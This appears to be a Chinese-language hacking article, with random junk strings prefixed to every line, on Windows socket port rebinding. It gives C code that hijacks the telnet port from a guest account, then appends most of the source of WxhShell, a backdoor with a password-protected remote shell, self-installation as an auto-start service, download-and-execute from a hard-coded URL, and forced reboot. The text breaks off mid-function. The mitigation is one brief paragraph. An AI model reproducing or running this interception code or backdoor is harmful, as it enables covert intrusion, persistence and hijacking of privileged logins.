在WINDOWS的SOCKET服务器应用的编程中,如下的语句或许比比都是:
).Fpgxs s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
R%{a1r>9h 19HM])Zw\ saddr.sin_family = AF_INET;
ur3(HL [NaN>BZ? saddr.sin_addr.s_addr = htonl(INADDR_ANY);
!zkZQ2{Wn G!"YpYml bind(s,(SOCKADDR *)&saddr,sizeof(saddr));
QIB\AAclO uehDIl0\[b 其实这当中存在在非常大的安全隐患,因为在winsock的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,而且没有权限之分,也就是说低级权限的用户是可以重绑定在高级权限如服务启动的端口上的,这是非常重大的一个安全隐患。
I/&%]"[^u **$LR<L 这意味着什么?意味着可以进行如下的攻击:
Gcdd3W`O .} q&5v 1。一个木马绑定到一个已经合法存在的端口上进行端口的隐藏,他通过自己特定的包格式判断是不是自己的包,如果是自己处理,如果不是通过127.0.0.1的地址交给真正的服务器应用进行处理。
6HZ` .o:f |_] Q$q[[% 2。一个木马可以在低权限用户上绑定高权限的服务应用的端口,进行该处理信息的嗅探,本来在一个主机上监听一个SOCKET的通讯需要具备非常高的权限要求,但其实利用SOCKET重绑定,你可以轻易的监听具备这种SOCKET编程漏洞的通讯,而无须采用什么挂接,钩子或低层的驱动技术(这些都需要具备管理员权限才能达到)
H=g`hF]` G+%zn| 3。针对一些的特殊应用,可以发起中间人攻击,从低权限用户上获得信息或事实欺骗,如在guest权限下拦截telnet服务器的23端口,如果是采用NTLM加密认证,虽然你无法通过嗅探直接获取密码,但一旦有admin用户通过你登陆以后,你的应用就完全可以发起中间人攻击,扮演这个登陆的用户通过SOCKET发送高权限的命令,到达入侵的目的。
qT%FmX \!k1a^ZP 4.对于构建的WEB服务器,入侵者只需要获得低级的权限,就可以完全达到更改网页目的,很简单,扮演你的服务器给予连接请求以其他信息的应答,甚至是基于电子商务上的欺骗,获取非法的数据。
d/ARm-D {>R:vH8 其实,MS自己的很多服务的SOCKET编程都存在这样的问题,telnet,ftp,http的服务实现全部都可以利用这种方法进行攻击,在低权限用户上实现对SYSTEM应用的截听。包括W2K+SP3的IIS也都一样,那么如果你已经可以以低权限用户入侵或木马植入的话,而且对方又开启了这些服务的话,那就不妨一试。并且我估计还有很多第三方的服务也大多存在这个漏洞。
+wEac
g>>E mzeY%A<0^ 解决的方法很简单,在编写如上应用的时候,绑定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求独占所有的端口地址,而不允许复用。这样其他人就无法复用这个端口了。
bL'aB{s #pb92kA' 下面就是一个简单的截听ms telnet服务器的例子,在GUEST用户下都能成功进行截听,剩余的就是大家根据自己的需要,进行一些特殊剪裁的问题了:如是隐藏,嗅探数据,高权限用户欺骗等。
V#XppYU ,{BaePMp #include
b\3Oyp> #include
?98("T|y; #include
ht2\ y&si #include
AfX}y+Ah DWORD WINAPI ClientThread(LPVOID lpParam);
O_ChxX0KP int main()
QWD'!)Zb {
-*$HddD WORD wVersionRequested;
L\@I*QP DWORD ret;
G_0(
|% WSADATA wsaData;
n;@bLJ$W BOOL val;
d Vj_8> SOCKADDR_IN saddr;
z2g3FUTX)b SOCKADDR_IN scaddr;
tKuVQH~D int err;
yKa{08X: SOCKET s;
z.kvX+7' SOCKET sc;
(BTVD,G int caddsize;
EK;YiJ HANDLE mt;
#:[t^} DWORD tid;
qv]}$WU wVersionRequested = MAKEWORD( 2, 2 );
bmfI~8 err = WSAStartup( wVersionRequested, &wsaData );
'
0J1vG~c if ( err != 0 ) {
{[+mpKq printf("error!WSAStartup failed!\n");
v hpNpgz return -1;
]L9s%]o }
VHCK2}ps saddr.sin_family = AF_INET;
np8gKVD |C!ox hu< //截听虽然也可以将地址指定为INADDR_ANY,但是要不能影响正常应用情况下,应该指定具体的IP,留下127.0.0.1给正常的服务应用,然后利用这个地址进行转发,就可以不影响对方正常应用了
^G4Py<s i.3=!6z saddr.sin_addr.s_addr = inet_addr("192.168.0.60");
P{wF"vf saddr.sin_port = htons(23);
<,[cQ I/ if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
J%x\=Sv {
BQ=PW|[ printf("error!socket failed!\n");
yzerOL return -1;
*M:B\D }
<kGU,@6PF val = TRUE;
3QG7C{ //SO_REUSEADDR选项就是可以实现端口重绑定的
K_RjX>q%N if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
+89*)pk {
sE:M@`2L printf("error!setsockopt failed!\n");
`%+Wz0(K return -1;
_H j!2 ' }
Xs~[& //如果指定了SO_EXCLUSIVEADDRUSE,就不会绑定成功,返回无权限的错误代码;
2w["aVr
= //如果是想通过重利用端口达到隐藏的目的,就可以动态的测试当前已绑定的端口哪个可以成功,就说明具备这个漏洞,然后动态利用端口使得更隐蔽
$wo?!gt //其实UDP端口一样可以这样重绑定利用,这儿主要是以TELNET服务为例子进行攻击
Nv(9N-9r ~8GF Q ph if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
)%`^xR {
fA+,TEB~d ret=GetLastError();
k@/sn(x printf("error!bind failed!\n");
fh](K'P#^ return -1;
,.kha8v }
CIb2J)qev listen(s,2);
U)E(`{p] while(1)
>8k_n {
qU#1i:(F* caddsize = sizeof(scaddr);
BW 4%l //接受连接请求
9{
>Ui sc = accept(s,(struct sockaddr *)&scaddr,&caddsize);
^pQCNKLBY if(sc!=INVALID_SOCKET)
y#U+c*LB {
S/9DtXQ mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
,n3a
gkPO> if(mt==NULL)
IIn"=g=9 {
uTKD 4yig printf("Thread Creat Failed!\n");
3NqN\5B: break;
_*1`@ }
u*Pibgd< }
J|~MC7#@q CloseHandle(mt);
?}kG`q }
umt.Um.m2 closesocket(s);
YVHm{A1b0 WSACleanup();
j$?{\iXZ return 0;
C-\S/yd }
AlAY iUw{ DWORD WINAPI ClientThread(LPVOID lpParam)
9}PhN<Gd {
Y8-86 *zC SOCKET ss = (SOCKET)lpParam;
f;W|\z' SOCKET sc;
LR".pH13 unsigned char buf[4096];
nV -mPyfL8 SOCKADDR_IN saddr;
J&.{7YF long num;
" @v <Bk DWORD val;
D-5VC9{ DWORD ret;
0w&27wW //如果是隐藏端口应用的话,可以在此处加一些判断
P<M?Qd1. //如果是自己的包,就可以进行一些特殊处理,不是的话通过127.0.0.1进行转发
$W!!wN=B saddr.sin_family = AF_INET;
kBD>-5Sn_T saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
$5ak_@AC saddr.sin_port = htons(23);
P)Rh=U if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
j g8fU {
ABD)}n=%c printf("error!socket failed!\n");
e?JW return -1;
i{`FmrPO~ }
x{n`^;Y1 val = 100;
l5Gq|!2yxD if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
4QvsBpz@ {
eU".3`CtY ret = GetLastError();
?o81E2TJO return -1;
n%-R[vW }
`(_s|-$ if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
9~]~#Uj {
mlJ!:WG ret = GetLastError();
G Uon/G8 return -1;
"4riSxEyF }
ca7=V/i_a{ if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
k1{K*O$e {
_AAaC_q printf("error!socket connect failed!\n");
!g5xq closesocket(sc);
bpH^:fyLU` closesocket(ss);
"alyfyBu'M return -1;
x4;"!Kq\ }
{^CY..3
A while(1)
y(CS5v#FG {
|iE50, //下面的代码主要是实现通过127。0。0。1这个地址把包转发到真正的应用上,并把应答的包再转发回去。
dQV;3^iUY //如果是嗅探内容的话,可以再此处进行内容分析和记录
YQHw1 //如果是攻击如TELNET服务器,利用其高权限登陆用户的话,可以分析其登陆用户,然后利用发送特定的包以劫持的用户身份执行。
[|(N_[E|6 num = recv(ss,buf,4096,0);
YKH\rN6X if(num>0)
pWK(z[D send(sc,buf,num,0);
/&
Jan: else if(num==0)
x[h^[oF0 break;
bwD,YC num = recv(sc,buf,4096,0);
*K|W
/'_& if(num>0)
pA9+Cr!0Q send(ss,buf,num,0);
eg(6^:z?f else if(num==0)
eJxw)zd7 break;
gW>uR3Ca4 }
gQ'zW closesocket(ss);
#_6I w`0 closesocket(sc);
Q=AavKn# return 0 ;
wy0tgy(' | }
8$6Y{$&C `j,Yb]~s79 vk77B(u ==========================================================
O_wEcJPE OSs&r$ 下边附上一个代码,,WXhSHELL
v!<gY
m& 7"sD5N/>uh ==========================================================
/67 h&j g.BdlVB\ #include "stdafx.h"
$c0h.t e+~\+:[? #include <stdio.h>
'*5i)^ #include <string.h>
_F>CBG #include <windows.h>
Qw-~>d #include <winsock2.h>
QEz?w}b* #include <winsvc.h>
YB(Q\hT~\; #include <urlmon.h>
;<&*rnH ar__ Pf6r #pragma comment (lib, "Ws2_32.lib")
}& cu/o4 #pragma comment (lib, "urlmon.lib")
yXSFjcoB l`oZ)?ur #define MAX_USER 100 // 最大客户端连接数
,K9*%rW) #define BUF_SOCK 200 // sock buffer
WI-&x
' #define KEY_BUFF 255 // 输入 buffer
% tS,}ze /t+f{VX$ #define REBOOT 0 // 重启
o /j*d3 #define SHUTDOWN 1 // 关机
(;T^8mI2 `uOT+B%R #define DEF_PORT 5000 // 监听端口
RL!Oi|8 9s\A\$("l #define REG_LEN 16 // 注册表键长度
gbF+WE #define SVC_LEN 80 // NT服务名长度
L2\#w<d ]V^iN=(_5 // 从dll定义API
"I3@m%qv typedef DWORD (WINAPI pREGISTERSERVICEPROCESS) (DWORD,DWORD);
$"+djI?E9 typedef LONG (WINAPI *PROCNTQSIP)(HANDLE,UINT,PVOID,ULONG,PULONG);
A\4D79>x typedef BOOL (WINAPI *ENUMPROCESSMODULES) (HANDLE hProcess, HMODULE * lphModule, DWORD cb, LPDWORD lpcbNeeded);
-ws? "_w typedef DWORD (WINAPI *GETMODULEBASENAME) (HANDLE hProcess, HMODULE hModule, LPTSTR lpBaseName, DWORD nSize);
\k .{-nh b*a#<K$T_ // wxhshell配置信息
7m4aoK struct WSCFG {
t^+ik1. int ws_port; // 监听端口
);#JL0I char ws_passstr[REG_LEN]; // 口令
X <f8,n int ws_autoins; // 安装标记, 1=yes 0=no
[xSF6 char ws_regname[REG_LEN]; // 注册表键名
uatm/o^~, char ws_svcname[REG_LEN]; // 服务名
l4F%VR4KT char ws_svcdisp[SVC_LEN]; // 服务显示名
2BQ
j char ws_svcdesc[SVC_LEN]; // 服务描述信息
q]T1dz? char ws_passmsg[SVC_LEN]; // 密码输入提示信息
z[b@V int ws_downexe; // 下载执行标记, 1=yes 0=no
SIBtmm1W char ws_fileurl[SVC_LEN]; // 下载文件的 url, "
http://xxx/file.exe"
7''??X char ws_filenam[SVC_LEN]; // 下载后保存的文件名
A,JmX W0dSsjNio };
zZL6z4g .c8g:WB< // default Wxhshell configuration
k.uH~S _ struct WSCFG wscfg={DEF_PORT,
arIf'CG6 "xuhuanlingzhe",
a=J^ 1,
my(2;IJ#{ "Wxhshell",
J%u=Ucdh "Wxhshell",
0(eBZdRO "WxhShell Service",
;rF\kX&Jh "Wrsky Windows CmdShell Service",
2;k*@k-t "Please Input Your Password: ",
Sdp&jZY 1,
<c2E'U)X "
http://www.wrsky.com/wxhshell.exe",
MI/MhkS
? "Wxhshell.exe"
94h]~GqNi };
fz|cnU IHB}`e| // 消息定义模块
z06r6 char *msg_ws_copyright="\n\rWxhShell v1.0 (C)2005
http://www.wrsky.com\n\rMake by 虚幻灵者\n\r";
7I&&bWB char *msg_ws_prompt="\n\r? for help\n\r#>";
s2h@~y char *msg_ws_cmd="\n\ri Install\n\rr Remove\n\rp Path\n\rb reboot\n\rd shutdown\n\rs Shell\n\rx exit\n\rq Quit\n\r\n\rDownload:\n\r#>
http://.../server.exe\n\r";
J[l7di5 char *msg_ws_ext="\n\rExit.";
CS2Bo char *msg_ws_end="\n\rQuit.";
( /=f6^} char *msg_ws_boot="\n\rReboot...";
MLXN Zd char *msg_ws_poff="\n\rShutdown...";
N-G1h?e4 char *msg_ws_down="\n\rSave to ";
fT;s-v[`k joFm]3$; char *msg_ws_err="\n\rErr!";
,f~J`3(& char *msg_ws_ok="\n\rOK!";
qB5j;@r 1Ir21un char ExeFile[MAX_PATH];
k
Z?=AXu int nUser = 0;
6/5YjO|a HANDLE handles[MAX_USER];
F0GxH? int OsIsNt;
,c;Kzp>e H3z:ZTI SERVICE_STATUS serviceStatus;
aRj9E} SERVICE_STATUS_HANDLE hServiceStatusHandle;
$Ipg&`S" Njxv4cc // 函数声明
Z_$%. int Install(void);
C^O
VB- int Uninstall(void);
Y1OCLnK~ int DownloadFile(char *sURL, SOCKET wsh);
(7vF/7BZ|_ int Boot(int flag);
APvDP? void HideProc(void);
W<bGDh int GetOsVer(void);
@P#N2:jwj int Wxhshell(SOCKET wsl);
'}9x\3E void TalkWithClient(void *cs);
hpHr\g int CmdShell(SOCKET sock);
#*D)Q/k int StartFromService(void);
=b%MXT int StartWxhshell(LPSTR lpCmdLine);
1a?!@g) O9G[j=U VOID WINAPI NTServiceMain( DWORD dwArgc, LPTSTR *lpszArgv );
}u\])I3 VOID WINAPI NTServiceHandler( DWORD fdwControl );
VrHv)lUr m}C>ti`VD // 数据结构和表定义
(uXL^oja SERVICE_TABLE_ENTRY DispatchTable[] =
vq0Vq(V= {
@:j}Jmg {wscfg.ws_svcname, NTServiceMain},
TITKj?*o {NULL, NULL}
L9r8BK; };
J*r*X. ?Y$JWEPJ // 自我安装
?iw!OoZ` int Install(void)
P0SQr?W {
A#K14Ayr char svExeFile[MAX_PATH];
VQ(j pns5 HKEY key;
gT3_RUF strcpy(svExeFile,ExeFile);
_>5(iDW0 Vp#JS3Y // 如果是win9x系统,修改注册表设为自启动
t#V!8EpBg if(!OsIsNt) {
(]Z_UTT if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
0g
+7uGp: RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
l}a)ZeR1 RegCloseKey(key);
Sxnpq Vbk if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
n4s+>|\M RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
./-5R|fN RegCloseKey(key);
P9GN}GN%v return 0;
-C;^3R[
O }
m!gz3u]rN }
?h3Y)5x T }
9{'N{ else {
?~l6K(*2 a+[RS]le // 如果是NT以上系统,安装为系统服务
J28M@cn SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE);
Tre]"2l if (schSCManager!=0)
;%B(_c {
!F*5M1Kjd SC_HANDLE schService = CreateService
c'^?/$H| (
wu7Lk3 schSCManager,
Umz KY wscfg.ws_svcname,
<5-[{Q/2z wscfg.ws_svcdisp,
%<)2/|lCd SERVICE_ALL_ACCESS,
aEFJ;n7m SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS ,
68NYIyTW9 SERVICE_AUTO_START,
`EEL1[:BR SERVICE_ERROR_NORMAL,
q2/pNV# svExeFile,
c#XXp"7k2 NULL,
!-z'2B*:^ NULL,
9`T)@Uj2n NULL,
HD@$t)mn NULL,
)YYf1o[+ NULL
3]OE}[R );
o~U$GBg if (schService!=0)
e{h<g>7 {
rDD:7*z CloseServiceHandle(schService);
")_|69 VX CloseServiceHandle(schSCManager);
Hu^1[# strcpy(svExeFile,"SYSTEM\\CurrentControlSet\\Services\\");
l\E%+?K+^ strcat(svExeFile,wscfg.ws_svcname);
3oBtP<yG. if(RegOpenKey(HKEY_LOCAL_MACHINE,svExeFile,&key)==ERROR_SUCCESS) {
$'0u |Xy` RegSetValueEx(key,"Description",0,REG_SZ,(BYTE *)wscfg.ws_svcdesc,lstrlen(wscfg.ws_svcdesc));
%r<rcY RegCloseKey(key);
I.WvLLK2 return 0;
XQrF4l }
vV'EZ? }
ob+b<HFv CloseServiceHandle(schSCManager);
&)YQv Tzs }
^Xuvy{TkPH }
Hta y-PB } ynmWW^dg return 1;
45=bGf# }
r [9x dl.N.P7}4 // 自我卸载
dah[:rP,n{ int Uninstall(void)
b1?#81 {
teOe#* HKEY key;
}wWKFX QgrpBG if(!OsIsNt) {
8/DS:uM if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
QsGiclU RegDeleteValue(key,wscfg.ws_regname);
3RiWZN RegCloseKey(key);
H;D>|q if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
Qwz}B RegDeleteValue(key,wscfg.ws_regname);
)bA;?i RegCloseKey(key);
Bt[/0>i return 0;
)}''L{k- }
?RX3MUN }
#c!*</ }
K}2Erm%A@y else {
(ScxLf=] qBU-~"2t SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS);
hMzs*gK if (schSCManager!=0)
x*
DarSk {
7@#>bE6 SC_HANDLE schService = OpenService( schSCManager, wscfg.ws_svcname, SERVICE_ALL_ACCESS);
h&|[eZt?F if (schService!=0)
pny11C {
ylUrLQ\ if(DeleteService(schService)!=0) {
#m lS}~n CloseServiceHandle(schService);
Hh%I0# CloseServiceHandle(schSCManager);
Xk:OL,c return 0;
*zNYZ# }
:KH g&ZX7 CloseServiceHandle(schService);
[l:x'_y }
a! (4Ch CloseServiceHandle(schSCManager);
v.\*./-i }
-Btk 3 }
2;xIL] fTzvmC:g7 return 1;
h,QKd>4:CF }
9*$t!r{B@ .\K_@M // 从指定url下载文件
tWo{7) Eb int DownloadFile(char *sURL, SOCKET wsh)
_my"%@n {
3sc+3-TF HRESULT hr;
*RT>`,t/ char seps[]= "/";
6~OoFm5 char *token;
y@]_+2Vo char *file;
wWgWWXGT} char myURL[MAX_PATH];
9K/HO!z char myFILE[MAX_PATH];
m 2-Sx =Xm@YVf&ZD strcpy(myURL,sURL);
(As#^q\>B token=strtok(myURL,seps);
eD-#b| while(token!=NULL)
R|JC1f8P5 {
`id9j file=token;
mCRt8rY; token=strtok(NULL,seps);
;g8R4!J }
so^lb?g >82@Q^O GetCurrentDirectory(MAX_PATH,myFILE);
WJ)z6m] strcat(myFILE, "\\");
w'L\?pI strcat(myFILE, file);
~L]|?d" send(wsh,myFILE,strlen(myFILE),0);
|].pDwgt send(wsh,"...",3,0);
\Fl+\?~D hr = URLDownloadToFile(0, sURL, myFILE, 0, 0);
h"lX4 if(hr==S_OK)
KgV3j]d return 0;
u,F nAh?" else
!P ~_Dl2d return 1;
EQ2#/> g$n7CXoT }
^F>cp
,x k-Q%.o // 系统电源模块
ot@|!V int Boot(int flag)
4B=2>k {
Yj%U
>),8 HANDLE hToken;
-8'C\R|J+ TOKEN_PRIVILEGES tkp;
)_a~}
U]=. nJbtS#`G4 if(OsIsNt) {
_4TH4~cY OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
"~`I::'c LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
Z.d7U~_ tkp.PrivilegeCount = 1;
ekI2icD tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
A2^\q>_# AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
jATI&oX if(flag==REBOOT) {
R=.4 if(ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0))
S2n39 3 return 0;
yPM3a7-Bm }
]FD'5p{ else {
"mX\&%i6\p if(ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0))
~SQ?BoCI[ return 0;
N03G>fZ }
R,)}>X|< }
Xm+8 else {
'iy*^A `Y if(flag==REBOOT) {
Nb?w|Ne(T if(ExitWindowsEx(EWX_REBOOT + EWX_FORCE,0))
CxGx8*<X return 0;
*ohL&